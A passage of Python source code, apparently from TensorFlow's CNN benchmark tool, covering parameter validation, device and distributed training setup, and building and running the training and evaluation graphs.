= True else: # Note self._doing_eval can later switch to True in self._do_eval() if # self.params.eval_during_training_* is specified. self._doing_eval = False self.dataset = dataset or datasets.create_dataset(self.params.data_dir, self.params.data_name) self.model = model or model_config.get_model_config( self.params.model, self.dataset, self.params) self.trace_filename = self.params.trace_file self.rewriter_config = self.params.rewriter_config autotune_threshold = self.params.autotune_threshold if ( self.params.autotune_threshold) else 1 min_autotune_warmup = 5 * autotune_threshold * autotune_threshold self.num_warmup_batches = self.params.num_warmup_batches if ( self.params.num_warmup_batches is not None) else max( 10, min_autotune_warmup) self.graph_file = self.params.graph_file self.resize_method = self.params.resize_method self.sync_queue_counter = 0 self.num_gpus = self.params.num_gpus if self.params.gpu_indices: self.gpu_indices = [int(x) for x in self.params.gpu_indices.split(',')] else: self.gpu_indices = [x for x in range(self.num_gpus)] if (self.params.device == 'cpu' and self.params.data_format == 'NCHW' and not self.params.mkl): raise ValueError('device=cpu requires that data_format=NHWC') if ((self.params.num_epochs_per_decay or self.params.learning_rate_decay_factor) and not (self.params.init_learning_rate is not None and self.params.num_epochs_per_decay and self.params.learning_rate_decay_factor)): raise ValueError('If one of num_epochs_per_decay or ' 'learning_rate_decay_factor is set, both must be set' 'and learning_rate must be set') if (self.params.minimum_learning_rate and not (self.params.init_learning_rate is not None and self.params.num_epochs_per_decay and self.params.learning_rate_decay_factor)): raise ValueError('minimum_learning_rate requires learning_rate,' 'num_epochs_per_decay, and ' 'learning_rate_decay_factor to be set') if (self.params.use_fp16 and self.params.fp16_vars and 'replicated' in self.params.variable_update and self.params.all_reduce_spec and 'nccl' in self.params.all_reduce_spec): raise ValueError('fp16 variables are not supported with NCCL') if (self.params.use_fp16 and self.params.fp16_vars and self.params.gradient_repacking): raise ValueError('--fp16_vars cannot be used with --gradient_repacking') if self.params.variable_update == 'horovod' and self.params.num_gpus > 1: raise ValueError('Horovod benchmarks require num_gpus=1 on each worker') if self.params.variable_update == 'horovod' and self.params.job_name: raise ValueError('job_name should not be specified for Horovod.') if self.params.use_fp16 and self.params.fp16_enable_auto_loss_scale: if self.params.all_reduce_spec and 'nccl' in self.params.all_reduce_spec: raise ValueError('Automatic loss scaling is not supported with NCCL.') if self.params.variable_update not in ('parameter_server', 'replicated', 'independent'): raise ValueError('Automatic loss scaling is not supported with ' 'variable_update=%s.' % self.params.variable_update) if self.params.staged_vars: raise ValueError('Automatic loss scaling is not supported with' 'staged_vars.') if (self.params.debugger is not None and self.params.debugger != 'cli' and ':' not in self.params.debugger): raise ValueError('--debugger must be "cli" or in the form ' 'host:port') if self.params.hierarchical_copy and self.params.num_gpus <= 1: raise ValueError('--hierarchical_copy requires --num_gpus to be greater ' 'than 1') if params.save_model_secs and params.save_model_steps: raise ValueError('At most one of --save_model_secs and ' '--save_model_steps can be specified') eval_during_training_flags = list(map(bool, [ params.eval_during_training_every_n_steps, params.eval_during_training_every_n_epochs, params.eval_during_training_at_specified_steps, params.eval_during_training_at_specified_epochs, ])) if eval_during_training_flags.count(True) > 1: raise ValueError('At most one flag with --eval_during_training_* prefix ' 'must be specified.') eval_during_training_enabled = any(eval_during_training_flags) if eval_during_training_enabled: if params.eval: raise ValueError('At most one of --eval and --eval_during_training_* ' 'must be specified') if params.forward_only: raise ValueError('At most one of --forward_only and ' '--eval_during_training_* must be specified') if params.job_name: raise ValueError('--eval_during_training_* is not yet supported in ' 'distributed mode.') if params.staged_vars: raise ValueError('--eval_during_training_* is not currently compatible ' 'with --staged_vars') if params.stop_at_top_1_accuracy and not eval_during_training_enabled: raise ValueError('--stop_at_top_1_accuracy is only supported with ' '--eval_during_training_*') if params.collect_eval_results_async and params.model != 'ssd300': raise ValueError('--collect_eval_results_async only works with ssd300 ' 'model currently.') if self.params.forward_only and self.params.freeze_when_forward_only: if self.params.train_dir is not None: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True, --train_dir should not be specified') if self.params.data_dir and not self.params.datasets_use_prefetch: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True and --data_dir is set, ' '--datasets_use_prefetch should be set to True') if self.params.job_name: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True, --job_name should not be specified and ' 'distributed running is not supported') self.forward_only_and_freeze = True else: self.forward_only_and_freeze = False if self.params.trt_mode: raise ValueError('--trt_mode should not be specified if one of ' '--forward_only and --freeze_when_forward_only is set ' 'to False') self.mode = get_mode_from_params(self.params) # Use the batch size from the command line if specified, otherwise use the # model's default batch size. Scale the benchmark's batch size by the # number of GPUs. if self.params.batch_size > 0: self.model.set_batch_size(self.params.batch_size) self.batch_size = self.model.get_batch_size() * self.num_gpus if self.mode in (constants.BenchmarkMode.TRAIN, constants.BenchmarkMode.TRAIN_AND_EVAL): self.train_batch_size = self.batch_size else: self.train_batch_size = None if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): if self.params.eval_batch_size > 0: self.eval_batch_size = self.params.eval_batch_size * self.num_gpus else: self.eval_batch_size = self.batch_size else: self.eval_batch_size = None self.batch_group_size = self.params.batch_group_size self.enable_auto_loss_scale = ( self.params.use_fp16 and self.params.fp16_enable_auto_loss_scale) self.loss_scale = None self.loss_scale_normal_steps = None self.job_name = self.params.job_name # "" for local training # PS server is used for distributed jobs not using all-reduce. use_ps_server = self.job_name and (self.params.variable_update != 'distributed_all_reduce' and self.params.variable_update != 'collective_all_reduce') # controller is used for distributed_all_reduce with > 1 worker. use_controller = ( self.params.variable_update == 'distributed_all_reduce' and self.job_name) if use_controller and not params.controller_host: raise ValueError('When variable_update==distributed_all_reduce ' 'controller_host must also be specified.') # collective_all_reduce doesn't need a controller or ps self.distributed_collective = ( self.params.variable_update == 'collective_all_reduce' and self.job_name) self.local_parameter_device_flag = self.params.local_parameter_device if self.job_name: self.task_index = self.params.task_index self.cluster_manager = platforms_util.get_cluster_manager( params, create_config_proto(params)) assert isinstance(self.cluster_manager, cnn_util.BaseClusterManager) worker_prefix = '/job:worker/replica:0/task:%s' % self.task_index if use_ps_server: self.param_server_device = tf.train.replica_device_setter( worker_device=worker_prefix + '/cpu:0', cluster=self.cluster_manager.get_cluster_spec()) # This device on which the queues for managing synchronization between # servers should be stored. self.sync_queue_devices = [ '/job:ps/replica:0/task:%s/cpu:0' % i for i in range(self.cluster_manager.num_ps()) ] else: self.sync_queue_devices = ['/job:worker/replica:0/task:0/cpu:0'] else: self.task_index = 0 self.cluster_manager = None worker_prefix = '' self.param_server_device = '/%s:0' % self.params.local_parameter_device self.sync_queue_devices = [self.param_server_device] if self.cluster_manager: self.num_workers = self.cluster_manager.num_workers() elif self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top self.num_workers = hvd.size() else: self.num_workers = 1 self.num_ps = self.cluster_manager.num_ps() if self.cluster_manager else 0 if self.num_workers > 1 and self.params.all_reduce_spec == 'nccl': raise ValueError('--all_reduce_spec=nccl is invalid in a ' 'multi-worker job') # Device to use for ops that need to always run on the local worker's CPU. self.cpu_device = '%s/cpu:0' % worker_prefix # Device to use for ops that need to always run on the local worker's # compute device, and never on a parameter server device. self.raw_devices = [ '%s/%s:%i' % (worker_prefix, self.params.device, i) for i in xrange(self.num_gpus) ] subset = 'validation' if params.eval else 'train' self.num_batches, self.num_epochs = get_num_batches_and_epochs( params, self.batch_size * self.num_workers, self.dataset.num_examples_per_epoch(subset)) if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): # TODO(reedwm): Currently we do extra eval logic for num_eval_batches and # the preprocessor. We should encapsulate this logic into a shared # function or class. if params.num_eval_batches is None and params.num_eval_epochs is None: eval_params = self.params else: eval_params = self.params._replace( num_batches=self.params.num_eval_batches, num_epochs=self.params.num_eval_epochs) self.num_eval_batches, self.num_eval_epochs = get_num_batches_and_epochs( eval_params, self.eval_batch_size * self.num_workers, self.dataset.num_examples_per_epoch('validation')) else: self.num_eval_batches, self.num_eval_epochs = None, None num_train_examples_per_epoch = self.dataset.num_examples_per_epoch('train') if self.params.eval_during_training_every_n_epochs: n_epochs = self.params.eval_during_training_every_n_epochs self.eval_during_training_at_specified_steps = { (int(e * num_train_examples_per_epoch + self.batch_size - 1) // self.batch_size) for e in np.arange(n_epochs, self.num_epochs, n_epochs)} if self.params.eval_during_training_at_specified_steps: try: self.eval_during_training_at_specified_steps = set(map( int, self.params.eval_during_training_at_specified_steps)) except ValueError: raise ValueError('Param eval_during_training_at_specified_steps value ' 'of %s cannot be converted to a list of integers.' % (self.params.eval_during_training_at_specified_steps)) if self.params.eval_during_training_at_specified_epochs: try: n_epochs = list(map( float, self.params.eval_during_training_at_specified_epochs)) offset = n_epochs[0] - 1 if offset.is_integer(): offset = int(offset) mlperf.logger.log(key=mlperf.tags.EVAL_EPOCH_OFFSET, value=offset) self.eval_during_training_at_specified_steps = { (int(e * num_train_examples_per_epoch + self.batch_size - 1) // self.batch_size) for e in n_epochs} except ValueError: raise ValueError('Param eval_during_training_at_specified_epochs value ' 'of %s cannot be converted to a list of floats.' % (self.params.eval_during_training_at_specified_epochs)) if params.eval_during_training_every_n_epochs: offset = params.eval_during_training_every_n_epochs - 1 if offset.is_integer(): offset = int(offset) mlperf.logger.log(key=mlperf.tags.EVAL_EPOCH_OFFSET, value=offset) if (self.params.staged_vars and self.params.variable_update != 'parameter_server'): raise ValueError('staged_vars for now is only supported with ' 'variable_update=parameter_server') if self.params.variable_update == 'parameter_server': if self.job_name: if not self.params.staged_vars: self.variable_mgr = variable_mgr.VariableMgrDistributedFetchFromPS( self) else: self.variable_mgr = ( variable_mgr.VariableMgrDistributedFetchFromStagedPS(self)) else: if not self.params.staged_vars: self.variable_mgr = variable_mgr.VariableMgrLocalFetchFromPS(self) else: self.variable_mgr = variable_mgr.VariableMgrLocalFetchFromStagedPS( self) elif self.params.variable_update == 'replicated': if self.job_name: raise ValueError('Invalid variable_update in distributed mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrLocalReplicated( self, self.params.all_reduce_spec, self.params.agg_small_grads_max_bytes, self.params.agg_small_grads_max_group, self.params.allreduce_merge_scope) elif self.params.variable_update == 'distributed_all_reduce': assert self.params.cross_replica_sync self.variable_mgr = variable_mgr.VariableMgrDistributedAllReduce( self, self.params.all_reduce_spec, ('worker' if self.num_workers > 1 else 'localhost'), self.num_workers, self.params.agg_small_grads_max_bytes, self.params.agg_small_grads_max_group, self.params.allreduce_merge_scope) elif self.params.variable_update == 'collective_all_reduce': assert self.params.cross_replica_sync self.variable_mgr = variable_mgr.VariableMgrCollectiveAllReduce( self, self.params.all_reduce_spec, self.num_workers, self.num_gpus, self.task_index, self.params.allreduce_merge_scope) elif self.params.variable_update == 'distributed_replicated': assert self.params.cross_replica_sync if not self.job_name: raise ValueError('Invalid variable_update in local mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrDistributedReplicated(self) elif self.params.variable_update in ('independent', 'horovod'): if self.job_name: raise ValueError('Invalid variable_update in distributed mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrIndependent(self) else: raise ValueError( 'Invalid variable_update: %s' % self.params.variable_update) # Device to use for running on the local worker's compute device, but # with variables assigned to parameter server devices. self.devices = self.variable_mgr.get_devices() if self.job_name: if use_ps_server: self.global_step_device = self.param_server_device elif self.params.variable_update == 'collective_all_reduce': self.global_step_device = self.cpu_device else: self.global_step_device = '/job:worker/replica:0/task:0/cpu:0' else: self.global_step_device = self.cpu_device self.input_preprocessor = None self.eval_input_preprocessor = None if not self.dataset.use_synthetic_gpu_inputs(): if not self.params.eval: self.input_preprocessor = self.get_input_preprocessor() if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): with self._do_eval(): self.eval_input_preprocessor = self.get_input_preprocessor() self.datasets_use_prefetch = ( self.params.datasets_use_prefetch and # TODO(rohanj): Figure out why --datasets_use_prefetch freezes on the # CPU. self.params.device.lower() != 'cpu' and self.input_preprocessor and self.input_preprocessor.supports_datasets()) self.init_global_step = 0 self._config_benchmark_logger() if self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL: # Remove "eval" from params so it is not accidentally used. Since eval can # still occur despite params.eval being False, params.eval should never # be used. We cannot yet remove this unconditionally, because the SSD # model still uses params.eval, and hence does not work properly with # --eval_during_training_*. # TODO(b/116627045): We should also remove fields that have an eval # equivalent, like num_batches and num_eval_batches. self.params = remove_param_fields(self.params, {'eval'}) @contextlib.contextmanager def _do_eval(self): """Context manager to switches BenchmarkCNN to eval mode. Any evaluation code should be put under this context manager. This context manager switches self._doing_eval to True. It also switches certain attributes, like self.num_batches and self.num_epochs, to be the number of batches and epochs for evaluation respectively Yields: Nothing. """ # TODO(b/116627045): Find a more general way of switching attributes to the # eval equivalents. old_doing_eval = self._doing_eval old_num_batches = self.num_batches old_num_epochs = self.num_epochs old_batch_size = self.batch_size try: self._doing_eval = True self.num_batches = self.num_eval_batches self.num_epochs = self.num_eval_epochs self.batch_size = self.eval_batch_size self.model.set_batch_size(self.eval_batch_size // self.num_gpus) yield finally: self._doing_eval = old_doing_eval self.num_batches = old_num_batches self.num_epochs = old_num_epochs self.batch_size = old_batch_size self.model.set_batch_size(old_batch_size // self.num_gpus) def _config_benchmark_logger(self): """Config the model garden benchmark logger.""" model_benchmark_logger = None if self.params.benchmark_log_dir is not None: try: from official.utils.logs import logger as models_logger # pylint: disable=g-import-not-at-top except ImportError: tf.logging.fatal('Please include tensorflow/models to the PYTHONPATH ' 'in order to use BenchmarkLogger. Configured ' 'benchmark_log_dir: %s' % self.params.benchmark_log_dir) raise model_benchmark_logger = models_logger.BenchmarkFileLogger( self.params.benchmark_log_dir) self.benchmark_logger = model_benchmark_logger # TODO(laigd): this changes the global device list which is used everywhere, # consider refactoring it. def reset_devices_for_task(self, task_num, is_local=False): """Used to imitate another task when building a distributed graph.""" worker_prefix = ('/job:localhost' if is_local else '/job:worker/replica:0/task:%s' % task_num) self.cpu_device = '%s/cpu:0' % worker_prefix self.raw_devices = [ '%s/%s:%i' % (worker_prefix, self.params.device, i) for i in xrange(self.num_gpus) ] self.devices = self.variable_mgr.get_devices() def raw_devices_across_tasks(self, is_local=False): """Returns list of raw device names across all tasks.""" if is_local: assert self.num_workers == 1 return self.raw_devices else: return [ 'job:worker/replica:0/task%s/%s:%i' % (t, self.params.device, i) for t in xrange(self.num_workers) for i in xrange(self.num_gpus) ] def print_info(self): """Print basic information.""" benchmark_info = self._get_params_info() log_fn('Model: %s' % self.model.get_model_name()) log_fn('Dataset: %s' % benchmark_info['dataset_name']) log_fn('Mode: %s' % self.mode) log_fn('SingleSess: %s' % benchmark_info['single_session']) log_fn('Batch size: %s global' % (self.batch_size * self.num_workers)) log_fn(' %s per device' % (self.batch_size // len(self.raw_devices))) if self.batch_group_size > 1: log_fn(' %d batches per prepocessing group' % self.batch_group_size) log_fn('Num batches: %d' % self.num_batches) log_fn('Num epochs: %.2f' % self.num_epochs) log_fn('Devices: %s' % benchmark_info['device_list']) log_fn('Data format: %s' % self.params.data_format) if self.rewriter_config: log_fn('RewriterConfig: %s' % self.rewriter_config) log_fn('Optimizer: %s' % self.params.optimizer) log_fn('Variables: %s' % self.params.variable_update) if (self.params.variable_update == 'replicated' or self.params.variable_update == 'distributed_all_reduce' or self.params.variable_update == 'collective_all_reduce'): log_fn('AllReduce: %s' % self.params.all_reduce_spec) if self.job_name: log_fn('Sync: %s' % self.params.cross_replica_sync) if self.params.staged_vars: log_fn('Staged vars: %s' % self.params.staged_vars) if self.params.variable_update == 'horovod' and self.params.horovod_device: log_fn('Horovod on: %s' % self.params.horovod_device) log_fn('==========') def _get_params_info(self): """Get the common parameters info for the benchmark run. Returns: A dict of processed parameters. """ dataset_name = self.dataset.name if self.dataset.use_synthetic_gpu_inputs(): dataset_name += ' (synthetic)' single_session = self.params.variable_update == 'distributed_all_reduce' if single_session: device_list = self.raw_devices_across_tasks() elif self.params.variable_update == 'horovod': device_list = ['horovod/%s:%d' % (self.params.device, idx) for idx in range(self.num_workers)] else: device_list = self.raw_devices return { 'dataset_name': dataset_name, 'single_session': single_session, 'device_list': device_list,} def _log_benchmark_run(self): """Log the benchmark info to the logger. The info logged here should be similar to print_info(), but in a structured JSON format. """ if self.benchmark_logger: benchmark_info = self._get_params_info() run_param = { 'model': self.model.get_model_name(), 'dataset': benchmark_info['dataset_name'], 'mode': self.mode, 'single_sess': benchmark_info['single_session'], 'devices': benchmark_info['device_list'], 'batch_size': self.batch_size, 'batch_size_per_device': self.batch_size // len(self.raw_devices), 'num_batches': self.num_batches, 'num_epochs': self.num_epochs, 'data_format': self.params.data_format, 'rewrite_config': self.rewriter_config, 'optimizer': self.params.optimizer, 'session_config': create_config_proto(self.params), } # TODO(scottzhu): tf_cnn_benchmark might execute several times with # different param setting on the same box. This will cause the run file to # only contain the latest info. The benchmark_log_dir should be updated # for every new run. self.benchmark_logger.log_run_info( self.model.get_model_name(), benchmark_info['dataset_name'], run_param, test_id=self.params.benchmark_test_id) def run(self): """Run the benchmark task assigned to this process. Returns: Dictionary of statistics for training or eval. Raises: ValueError: unrecognized job name. """ if self.params.job_name == 'ps': log_fn('Running parameter server %s' % self.task_index) self.cluster_manager.join_server() return {} # For distributed_all_reduce with multiple workers, drive # from a separate controller process. if self.params.variable_update == 'distributed_all_reduce': if self.params.job_name == 'worker': log_fn('Starting worker %s' % self.task_index) self.cluster_manager.join_server() return elif self.params.job_name and self.params.job_name != 'controller': raise ValueError('unrecognized job name: %s' % self.params.job_name) self._log_benchmark_run() log_fn('start:' + str(datetime.datetime.now())) if self._doing_eval: with tf.Graph().as_default(): # TODO(laigd): freeze the graph in eval mode. result = self._run_eval() else: result = self._benchmark_train() log_fn('end:' + str(datetime.datetime.now())) return result def _run_eval(self): """Evaluate a model every self.params.eval_interval_secs. Returns: Dictionary containing eval statistics. Currently returns an empty dictionary. Raises: ValueError: If self.params.train_dir is unspecified. """ if self.params.train_dir is None: raise ValueError('Trained model directory not specified') graph_info = self._build_eval_graph() saver = tf.train.Saver(self.variable_mgr.savable_variables()) summary_writer = tf.summary.FileWriter(self.params.eval_dir, tf.get_default_graph()) target = '' # TODO(huangyp): Check if checkpoints haven't updated for hours and abort. while True: with tf.Session( target=target, config=create_config_proto(self.params)) as sess: image_producer = None try: global_step = load_checkpoint(saver, sess, self.params.train_dir) image_producer = self._initialize_eval_graph( graph_info.enqueue_ops, graph_info.input_producer_op, graph_info.local_var_init_op_group, sess) except CheckpointNotFoundException: log_fn('Checkpoint not found in %s' % self.params.train_dir) else: # Only executes if an exception was not thrown self._eval_once(sess, summary_writer, graph_info.fetches, graph_info.summary_op, image_producer, global_step) if image_producer is not None: image_producer.done() if self.params.eval_interval_secs <= 0: break time.sleep(self.params.eval_interval_secs) return {} def _build_eval_graph(self, scope_name=None): """Build the evaluation graph. Args: scope_name: String to filter what summaries are collected. Only summary ops whose name contains `scope_name` will be added, which is useful for only including evaluation ops. Returns: A GraphInfo named_tuple containing various useful ops and tensors of the evaluation grpah. """ with self._do_eval(): input_producer_op, enqueue_ops, fetches = self._build_model() local_var_init_op = tf.local_variables_initializer() table_init_ops = tf.tables_initializer() variable_mgr_init_ops = [local_var_init_op] if table_init_ops: variable_mgr_init_ops.extend([table_init_ops]) with tf.control_dependencies([local_var_init_op]): variable_mgr_init_ops.extend(self.variable_mgr.get_post_init_ops()) local_var_init_op_group = tf.group(*variable_mgr_init_ops) summary_op = tf.summary.merge_all(scope=scope_name) # The eval graph has no execution barrier because it doesn't run in # distributed mode. execution_barrier = None # We do not use the global step during evaluation. global_step = None return GraphInfo(input_producer_op, enqueue_ops, fetches, execution_barrier, global_step, local_var_init_op_group, summary_op) # TODO(reedwm): For consistency, we should have a similar # "_initialize_train_graph" function. They can likely be the same function. def _initialize_eval_graph(self, enqueue_ops, input_producer_op, local_var_init_op_group, sess): """Initializes the evaluation graph. Args: enqueue_ops: Ops that adds the preprocessed images to the staging areas. input_producer_op: Op that produce the input batches (before preprocessing). local_var_init_op_group: Group of ops that perform per-device initialization work. sess: The session to initialize the eval graph with. Returns: An ImageProducer, or None if an ImageProducer isn't being used. """ with self._do_eval(): if local_var_init_op_group is not None: # We might reinitialize local variables if they were already initialized # during training. This is OK. sess.run(local_var_init_op_group) if self.dataset.queue_runner_required(): tf.train.start_queue_runners(sess=sess) image_producer = None if input_producer_op is not None: image_producer = cnn_util.ImageProducer( sess, input_producer_op, self.batch_group_size, self.params.use_python32_barrier) image_producer.start() if enqueue_ops: for i in xrange(len(enqueue_ops)): sess.run(enqueue_ops[:(i + 1)]) if image_producer is not None: image_producer.notify_image_consumption() return image_producer def _eval_once(self, sess, summary_writer, fetches, summary_op, image_producer, global_step): """Evaluate the model using the validation dataset.""" with self._do_eval(): mlperf.logger.log_eval_epoch( mlperf.tags.EVAL_START, global_step, self.batch_size) loop_start_time = start_time = time.time() # TODO(laigd): refactor the part to compute/report the accuracy. Currently # it only works for image models. top_1_accuracy_sum = 0.0 top_5_accuracy_sum = 0.0 total_eval_count = self.num_batches * self.batch_size for step in xrange(self.num_batches): if (summary_writer and self.params.save_summaries_steps > 0 and (step + 1) % self.params.save_summaries_steps == 0): results, summary_str = sess.run([fetches, summary_op]) summary_writer.add_summary(summary_str) else: results = sess.run(fetches) # Make global_step available in results for postprocessing. results['global_step'] = global_step results = self.model.postprocess(results) top_1_accuracy_sum += results['top_1_accuracy'] top_5_accuracy_sum += results['top_5_accuracy'] if (step + 1) % self.params.display_every == 0: duration = time.time() - start_time examples_per_sec = ( self.batch_size * self.params.display_every / duration) log_fn('%i\t%.1f examples/sec' % (step + 1, examples_per_sec)) start_time = time.time() if image_producer is not None: image_producer.notify_image_consumption() loop_end_time = time.time() accuracy_at_1 = top_1_accuracy_sum / self.num_batches accuracy_at_5 = top_5_accuracy_sum / self.num_batches summary = tf.Summary() summary.value.add(tag='eval/Accuracy@1', simple_value=accuracy_at_1) summary.value.add(tag='eval/Accuracy@5', simple_value=accuracy_at_5) for result_key, result_value in results.items(): if result_key.startswith(constants.SIMPLE_VALUE_RESULT_PREFIX): prefix_len = len(constants.SIMPLE_VALUE_RESULT_PREFIX) summary.value.add(tag='eval/' + result_key[prefix_len:], simple_value=result_value) if summary_writer: summary_writer.add_summary(summary, global_step) log_fn('Accuracy @ 1 = %.4f Accuracy @ 5 = %.4f [%d examples]' % (accuracy_at_1, accuracy_at_5, total_eval_count)) elapsed_time = loop_end_time - loop_start_time images_per_sec = (self.num_batches * self.batch_size / elapsed_time) if self.mode != constants.BenchmarkMode.TRAIN_AND_EVAL: # Note that we compute the top 1 accuracy and top 5 accuracy for each # batch, which will have a slight performance impact. log_fn('-' * 64) log_fn('total images/sec: %.2f' % images_per_sec) log_fn('-' * 64) if self.benchmark_logger: eval_result = { 'eval_top_1_accuracy', accuracy_at_1, 'eval_top_5_accuracy', accuracy_at_5, 'eval_average_examples_per_sec', images_per_sec, tf.GraphKeys.GLOBAL_STEP, global_step, } self.benchmark_logger.log_evaluation_result(eval_result) mlperf.logger.log_eval_epoch( mlperf.tags.EVAL_STOP, global_step, self.batch_size) mlperf.logger.log(key=mlperf.tags.EVAL_SIZE, value=self.num_batches * self.batch_size) if self.params.model != 'ssd300': # ssd300 logs eval accuracy elsewhere. mlperf.logger.log_eval_accuracy( accuracy_at_1, global_step, self.train_batch_size, examples_per_epoch=self.dataset.num_examples_per_epoch('train')) if self.params.stop_at_top_1_accuracy: mlperf.logger.log(key=mlperf.tags.EVAL_TARGET, value=self.params.stop_at_top_1_accuracy) return accuracy_at_1, accuracy_at_5 def _benchmark_train(self): """Run cnn in benchmark mode. Skip the backward pass if forward_only is on. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). """ graph = tf.Graph() with graph.as_default(): build_result = self._build_graph() if self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL: with self.variable_mgr.reuse_variables(): with tf.name_scope('Evaluation') as ns: eval_build_results = self._build_eval_graph(ns) else: eval_build_results = None (graph, result_to_benchmark) = self._preprocess_graph(graph, build_result) with graph.as_default(): return self._benchmark_graph(result_to_benchmark, eval_build_results) GPU_CACHED_INPUT_VARIABLE_NAME = 'gpu_cached_inputs' def _unfreezable_local_variables(self, graph): """Get the local variables that we don't want to freeze.""" return graph.get_collection( tf.GraphKeys.LOCAL_VARIABLES, # We don't freeze the gpu_cached_images local variable so it won't get # constant folded with ops which process the input. scope='.*' + BenchmarkCNN.GPU_CACHED_INPUT_VARIABLE_NAME) def _build_graph(self): """Build the graph. Returns: A namedtuple containing the ops/tensors that required by _benchmark_graph(). """ if self.params.variable_update == 'distributed_all_reduce': self.single_session = True (input_producer_op, enqueue_ops, fetches) = ( self._build_model_single_session()) else: self.single_session = False (input_producer_op, enqueue_ops, fetches) = self._build_model() fetches_list = nest.flatten(list(fetches.values())) main_fetch_group = tf.group(*fetches_list, name='main_fetch_group') execution_barrier = None if (not self.single_session and self.job_name and not self.params.cross_replica_sync): execution_barrier = self.add_sync_queues_and_barrier( 'execution_barrier_', []) global_step = tf.train.get_global_step() with tf.device(self.global_step_device), tf.name_scope('inc_global_step'): with tf.control_dependencies([main_fetch_group]): fetches['inc_global_step'] = global_step.assign_add(1) if ((not self.single_session) and (not self.distributed_collective) and self.job_name and self.params.cross_replica_sync): # Block all replicas until all replicas are ready for next step. fetches['sync_queues'] = self.add_sync_queues_and_barrier( 'sync_queues_step_end_', [main_fetch_group]) # Skips the init ops for freezable local variables in forward_only mode so # we can remove all the assign ops when converting variables to constants. with tf.name_scope('local_variable_initialization'): if self.forward_only_and_freeze: local_var_init_op = tf.variables_initializer( self._unfreezable_local_variables(tf.get_default_graph())) else: local_var_init_op = tf.local_variables_initializer() table_init_ops = tf.tables_initializer() variable_manager_init_ops = [local_var_init_op] if table_init_ops: variable_manager_init_ops.extend([table_init_ops]) if not self.forward_only_and_freeze: with tf.control_dependencies([local_var_init_op]): variable_manager_init_ops.extend(self.variable_mgr.get_post_init_ops()) if ((not self.single_session) and (not self.distributed_collective) and self.job_name and self.params.cross_replica_sync): # Ensure all workers execute variable_manager_init_ops before they start # executing the model. variable_manager_init_ops.append( self.add_sync_queues_and_barrier('init_ops_end_', variable_manager_init_ops)) local_var_init_op_group = tf.group(*variable_manager_init_ops, name='local_var_init_op_group') summary_op = tf.summary.merge_all() return GraphInfo( input_producer_op=input_producer_op, enqueue_ops=enqueue_ops, fetches=fetches, execution_barrier=execution_barrier, global_step=global_step, local_var_init_op_group=local_var_init_op_group, summary_op=summary_op) def _benchmark_graph(self, graph_info, eval_graph_info): """Benchmark the training graph. Args: graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. eval_graph_info: Similar to graph_info but for the eval graph if --eval_during_training_* is used. Otherwise, None. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). """ log_fn('Initializing graph') if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top # First worker will be 'chief' - it will write summaries and # save checkpoints. is_chief = hvd.rank() == 0 else: is_chief = (not self.job_name or self.task_index == 0) summary_writer = None if (is_chief and self.params.summary_verbosity and self.params.train_dir and self.params.save_summaries_steps > 0): summary_writer = tf.summary.FileWriter(self.params.train_dir, tf.get_default_graph()) # We want to start the benchmark timer right after a image_producer barrier # and avoids undesired waiting times on barriers. if ((self.num_warmup_batches + len(graph_info.enqueue_ops) - 1) % self.batch_group_size) != 0: self.num_warmup_batches = int( math.ceil( (self.num_warmup_batches + len(graph_info.enqueue_ops) - 1.0) / (self.batch_group_size)) * self.batch_group_size - len(graph_info.enqueue_ops) + 1) log_fn('Round up warm up steps to %d to match batch_group_size' % self.num_warmup_batches) assert ((self.num_warmup_batches + len(graph_info.enqueue_ops) - 1) % self.batch_group_size) == 0 # We run the summaries in the same thread as the training operations by # passing in None for summary_op to avoid a summary_thread being started. # Running summaries and training operations in parallel could run out of # GPU memory. if is_chief and not self.forward_only_and_freeze: saver = tf.train.Saver( self.variable_mgr.savable_variables(), save_relative_paths=True, max_to_keep=self.params.max_ckpts_to_keep) else: saver = None ready_for_local_init_op = None if self.job_name and not (self.single_session or self.distributed_collective): # In distributed mode, we don't want to run local_var_init_op_group until # the global variables are initialized, because local_var_init_op_group # may use global variables (such as in distributed replicated mode). We # don't set this in non-distributed mode, because in non-distributed mode, # local_var_init_op_group may itself initialize global variables (such as # in replicated mode). ready_for_local_init_op = tf.report_uninitialized_variables( tf.global_variables()) if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top bcast_global_variables_op = hvd.broadcast_global_variables(0) else: bcast_global_variables_op = None if self.params.variable_update == 'collective_all_reduce': # It doesn't matter what this collective_graph_key value is, # so long as it's > 0 and the same at every worker. init_run_options = tf.RunOptions() init_run_options.experimental.collective_graph_key = 6 else: init_run_options = tf.RunOptions() local_var_init_ops = [graph_info.local_var_init_op_group] if eval_graph_info: # `eval_graph_info.local_var_init_op_group` also includes some of the # training initializer ops, since it's difficult to filter them out. # Rerunning the training initializer ops is OK, but we add a control # dependency since running two sets of training initializer ops at the # same time can cause race conditions. with tf.control_dependencies(local_var_init_ops): local_var_init_ops.append(eval_graph_info.local_var_init_op_group) sv = tf.train.Supervisor( # For the purpose of Supervisor, all Horovod workers are 'chiefs', # since we want session to be initialized symmetrically on all the # workers. is_chief=is_chief or (self.params.variable_update == 'horovod' or self.distributed_collective), # Log dir should be unset on non-chief workers to prevent Horovod # workers from corrupting each other's checkpoints. logdir=self.params.train_dir if is_chief else None, ready_for_local_init_op=ready_for_local_init_op, local_init_op=local_var_init_ops, saver=saver, global_step=graph_info.global_step, 